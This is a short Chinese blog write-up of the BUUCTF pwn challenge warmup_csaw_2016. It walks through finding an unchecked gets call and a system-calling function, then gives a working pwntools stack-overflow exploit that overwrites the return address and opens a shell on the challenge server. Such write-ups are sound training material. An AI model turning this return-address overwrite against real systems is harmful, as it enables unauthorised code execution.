[buuctf pwn]warmup_csaw_2016
checksec一下,64位,没开栈溢出保护,可以利用
进入ida,有个gets能利用,然后v5的大小是64
然后看见一个40060D函数,是可以利用的system函数
所以用64+8填满缓冲区和rbp,然后接400611这个地址
from pwn import * p=remote('node5.buuoj.cn',26240) p.sendline(b'A'*72 + p64(0x400611)) p.interactive()
运行结果如下
本文作者:yee-l
本文链接:https://www.cnblogs.com/yee-l/p/18306787
版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步